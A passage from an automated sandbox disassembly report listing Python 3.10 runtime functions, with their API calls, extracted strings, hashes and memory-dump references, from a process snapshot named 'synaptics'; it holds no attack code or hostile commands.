                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FromUnicode_$Clear$Dict_ExceptionExitItem$AttrError_FatalGivenHandleLongLong_MatchesNormalizeObject_RestoreStringSystemTstate__acrt_iob_funcfflush
                                                                                                                                                                                                      • String ID: Original exception was:$%R returned NULL without setting an exception$0tl$Error in sys.excepthook:$OOOO$Pntl$PyThreadState_Get$__traceback__ must be a traceback or None$sys.excepthook$sys.excepthook is missing
                                                                                                                                                                                                      • API String ID: 3695135048-8881719
                                                                                                                                                                                                      • Opcode ID: 53bc8eb1c2abae2a8972fde7c3ae0e23024ac017f55c6017e8ec80f700cbfae2
                                                                                                                                                                                                      • Instruction ID: 93b0473aac739a70753529860863eba38f91abe91dda6d2c2399cafbca7d563a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53bc8eb1c2abae2a8972fde7c3ae0e23024ac017f55c6017e8ec80f700cbfae2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3D1D2B15043019FC700DF55DD80E5BBBE8AF88328F144A29F85997B62E731ED06CBA2
                                                                                                                                                                                                      Function 6C58ACE0 Relevance: 42.3, APIs: 14, Strings: 10, Instructions: 282COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 6C58AB10: _PyRuntimeState_Init.PYTHON310(?,6C77B000), ref: 6C58AB3A
                                                                                                                                                                                                      • Py_ExitStatusException.PYTHON310(?,?,?,?,?), ref: 6C58AD1D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionExitInitRuntimeState_Status
                                                                                                                                                                                                      • String ID: BuiltinImporter$Py_EndInterpreter$__annotations__$__builtins__$__loader__$__main__$builtins$not the last thread$thread is not current$thread still has a frame
                                                                                                                                                                                                      • API String ID: 490692338-3828858255
                                                                                                                                                                                                      • Opcode ID: 5ff8b430d8e73cd80bd2c79e38d8f6614de94e79b0cede915180d6102546bafa
                                                                                                                                                                                                      • Instruction ID: 3e3d173265308bd50923bdc468d920abd44ee644912dc5b51dee592fd4b92c9e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ff8b430d8e73cd80bd2c79e38d8f6614de94e79b0cede915180d6102546bafa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4081E6B15062249BD710EF18DD42F9637E4AB41328F148628E8588BFA1E734ED85CBD6
                                                                                                                                                                                                      Function 6C587B60 Relevance: 42.3, APIs: 20, Strings: 4, Instructions: 279COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C6CC,?,?,?,?,?,?,6C58800B,?,?,?,00000000), ref: 6C587B86
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C6A4,?,?,?,?,?,?,6C58800B,?,?,?,00000000), ref: 6C587B9B
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C6F8,?,?,?,?,?,?,?,6C58800B,?,?,?,00000000), ref: 6C587BB0
                                                                                                                                                                                                        • Part of subcall function 6C4A41E0: PyUnicode_FromString.PYTHON310(6C70079C,?,?,?,?,?,?,6C587BCA,?,?,?,?), ref: 6C4A4202
                                                                                                                                                                                                        • Part of subcall function 6C4A41E0: PyUnicode_InternInPlace.PYTHON310(?,?,?,?,?,?,?,6C587BCA,?,?,?,?), ref: 6C4A421B
                                                                                                                                                                                                      • _PyStructSequence_InitType.PYTHON310(6C751A50,6C74C28C,00000000,?,?,?,?,?,?,?,?,?,6C58800B,?), ref: 6C587BF5
                                                                                                                                                                                                      • _PyStructSequence_InitType.PYTHON310(6C751978,6C74C174,00000000,?,?,?,?,?,?,6C58800B,?,?,?,00000000), ref: 6C587D38
                                                                                                                                                                                                      • _PyStructSequence_InitType.PYTHON310(6C779F48,6C74DE9C,00000000,?,?,?,?,?,?,6C58800B,?,?,?,00000000), ref: 6C587D94
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unicode_$From$InitSequence_StructType$InternPlaceString
                                                                                                                                                                                                      • String ID: @Btl$MISSING$XRpl$Rpl
                                                                                                                                                                                                      • API String ID: 3257446536-1513174429
                                                                                                                                                                                                      • Opcode ID: 5c824e682521ebc74d2e08c4350dec785ecb1a270d1f34e2fbbfd0cac8a7d010
                                                                                                                                                                                                      • Instruction ID: 9bd57da1cc5e50fb8546e69368f4edda7624c9061fd46a840a60cc10c6659a36
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c824e682521ebc74d2e08c4350dec785ecb1a270d1f34e2fbbfd0cac8a7d010
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40A1E4B1B063158BE700DF24DE02F563BE4AF1139DF058568EC589BA12F770D6588BE2
                                                                                                                                                                                                      Function 6C57D8E0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 224COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000), ref: 6C57DA60
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,6C587495,?,?,?), ref: 6C57DA70
                                                                                                                                                                                                      • _setmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C587495,?,?,?), ref: 6C57DA7C
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00008000,?,?,?,?,?,?,?,?,?,?,?,?,6C587495,?), ref: 6C57DA88
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C587495,?), ref: 6C57DA92
                                                                                                                                                                                                      • _setmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C587495), ref: 6C57DA98
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00008000), ref: 6C57DAA4
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C57DAAE
                                                                                                                                                                                                      • _setmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C57DAB4
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000004,00000200), ref: 6C57DAD3
                                                                                                                                                                                                      • setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C57DADF
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000004,00000200), ref: 6C57DAEF
                                                                                                                                                                                                      • setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C57DAF5
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000004,00000200), ref: 6C57DB05
                                                                                                                                                                                                      • setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C57DB0B
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000004,00000200), ref: 6C57DB20
                                                                                                                                                                                                      • setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C57DB2A
                                                                                                                                                                                                      • _PyWideStringList_Copy.PYTHON310(6C77A13C,?), ref: 6C57DBA8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func$setvbuf$_fileno_setmode$CopyList_StringWide
                                                                                                                                                                                                      • String ID: 0pl$@bJl
                                                                                                                                                                                                      • API String ID: 1549323254-1725971319
                                                                                                                                                                                                      • Opcode ID: 584d7b3239c87f0084c90f006c450743774d8336ff7fcdbc240263faf5bebab7
                                                                                                                                                                                                      • Instruction ID: 7eefe62a6160e9e0b9a36c6a2187582e4479a7bee105e1d3917939988e3d3664
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 584d7b3239c87f0084c90f006c450743774d8336ff7fcdbc240263faf5bebab7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE918171B012049FDB14EF28CC95B6577B0BB46339F14827AEC299B6D2D730A584CF95
                                                                                                                                                                                                      Function 6C551D10 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 170COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,6C73E848), ref: 6C551D2C
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,6C73DC90), ref: 6C551D4B
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,6C73F1E0), ref: 6C551D66
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(don't know how to handle %.200s in error callback,?), ref: 6C551D80
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • PyUnicodeEncodeError_GetStart.PYTHON310(?,?), ref: 6C551D96
                                                                                                                                                                                                      • PyUnicodeEncodeError_GetEnd.PYTHON310(?,?), ref: 6C551DA7
                                                                                                                                                                                                      • PyUnicode_New.PYTHON310(?,0000FFFD), ref: 6C551DC1
                                                                                                                                                                                                      • Py_BuildValue.PYTHON310((Nn),00000000,?), ref: 6C551E07
                                                                                                                                                                                                      • PyUnicodeDecodeError_GetEnd.PYTHON310(?,?), ref: 6C551E1B
                                                                                                                                                                                                      • Py_BuildValue.PYTHON310((Cn),0000FFFD,?), ref: 6C551E38
                                                                                                                                                                                                      • PyUnicodeEncodeError_GetStart.PYTHON310(?,?), ref: 6C551E4C
                                                                                                                                                                                                      • PyUnicodeEncodeError_GetEnd.PYTHON310(?,?), ref: 6C551E61
                                                                                                                                                                                                      • PyUnicode_New.PYTHON310(?,0000003F), ref: 6C551E7C
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000003F,?), ref: 6C551EB3
                                                                                                                                                                                                      • Py_BuildValue.PYTHON310((Nn),00000000,?), ref: 6C551EC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Error_Unicode$Encode$BuildErr_SubtypeType_Unicode_Value$FormatStart$ClearDecodeFromObjectmemset
                                                                                                                                                                                                      • String ID: (Cn)$(Nn)$Hsl$don't know how to handle %.200s in error callback
                                                                                                                                                                                                      • API String ID: 1739794493-530000391
                                                                                                                                                                                                      • Opcode ID: 6d6e4d36f4d85ef3a62003e27a530a3c951377c4f154ae71762ff1fc597279f7
                                                                                                                                                                                                      • Instruction ID: 890f80a61a6aa0774944c173e1104948832fdcf11e887182550df5bb6eb14545
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d6e4d36f4d85ef3a62003e27a530a3c951377c4f154ae71762ff1fc597279f7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC41B276B0110967DF10A955AD81EEB7BAC9F852AAF440139ED0897B00FB25DE2982F1
                                                                                                                                                                                                      Function 6C475450 Relevance: 31.9, APIs: 12, Strings: 6, Instructions: 429COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73E920,00000000), ref: 6C475702
                                                                                                                                                                                                      • _PyErr_SetKeyError.PYTHON310(?), ref: 6C475761
                                                                                                                                                                                                      • PyDict_Keys.PYTHON310(?), ref: 6C4757A1
                                                                                                                                                                                                      • PyObject_GetIter.PYTHON310(00000000), ref: 6C4757C2
                                                                                                                                                                                                      • PyIter_Next.PYTHON310(00000000), ref: 6C4757E6
                                                                                                                                                                                                      • PyDict_Contains.PYTHON310(?,00000000), ref: 6C475800
                                                                                                                                                                                                      • PyObject_GetItem.PYTHON310(?,00000000), ref: 6C475834
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,00000000), ref: 6C47584C
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(?), ref: 6C4758B6
                                                                                                                                                                                                      • _PyErr_SetKeyError.PYTHON310(00000000), ref: 6C4758F0
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?), ref: 6C475928
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000A01), ref: 6C47594D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Dict_$ErrorItemObject_$ClearContainsExceptionFormatGivenIterIter_KeysMatchesNextObject
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$@xJlr$D:\a\1\s\Objects\dictobject.c$VUUU$VUUU$dict mutated during update
                                                                                                                                                                                                      • API String ID: 3633080584-1435073003
                                                                                                                                                                                                      • Opcode ID: 212cf06b05ef976152f224fa264caf2d84716f8d6510299b8f248905925121f4
                                                                                                                                                                                                      • Instruction ID: 345ba6aab67991be3dc205166f0887aa794596394b9094283b62b550743ade3f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 212cf06b05ef976152f224fa264caf2d84716f8d6510299b8f248905925121f4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDE1E671A042018BC720CF69D880E9AB7F4AF85339F144769E8688FB91D735EC56CBE1
                                                                                                                                                                                                      Function 6C57A8C0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 124COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?), ref: 6C57A8EE
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(_config_init), ref: 6C57A905
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: From$LongLong_StringUnicode_
                                                                                                                                                                                                      • String ID: _config_init$dev_mode$isolated$use_environment
                                                                                                                                                                                                      • API String ID: 3846272950-1456407024
                                                                                                                                                                                                      • Opcode ID: 5a9681697f549afb1a9000bbddf684c3f5505f3d130c3bf693e8118f535ee15d
                                                                                                                                                                                                      • Instruction ID: a13259b61c04bf81216cf5e3a88b0f690b6d8c46b60212552a4ebeb1ef95008e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a9681697f549afb1a9000bbddf684c3f5505f3d130c3bf693e8118f535ee15d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41D6B2900306EBDB21DBE58D40EDE76B4DF0023CF1402B9D52056A91EB74DE95E7A2
                                                                                                                                                                                                      Function 6C45EF00 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 400COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyBytesWriter_Prepare.PYTHON310(00000200,?,?), ref: 6C45EF59
                                                                                                                                                                                                      • _PyBytesWriter_Prepare.PYTHON310(?,?,?), ref: 6C45F116
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C45F130
                                                                                                                                                                                                      • _PyBytesWriter_Prepare.PYTHON310(?,?,00000000), ref: 6C45F285
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C45F29F
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C45F30F
                                                                                                                                                                                                      • _PyBytesWriter_Finish.PYTHON310(?,00000000), ref: 6C45F362
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,PyBytes_FromFormatV(): %c format expects an integer in range [0; 255],?), ref: 6C45F397
                                                                                                                                                                                                      • _PyBytesWriter_Prepare.PYTHON310(?,?,?), ref: 6C45F3D3
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C45F3EB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BytesWriter_$Preparememcpy$Err_FinishString
                                                                                                                                                                                                      • String ID: %ld$%lu$%zd$%zu$0x$Ltol$PyBytes_FromFormatV(): %c format expects an integer in range [0; 255]
                                                                                                                                                                                                      • API String ID: 3236527891-3920794546
                                                                                                                                                                                                      • Opcode ID: d4c56e4c09962f0a78f6b23c12948f3a1c44cfbe7f017222d635ed77b2032cfb
                                                                                                                                                                                                      • Instruction ID: dab6393028702def33770cecb9c64351bd171902c0247e9f058d77cea6b8daec
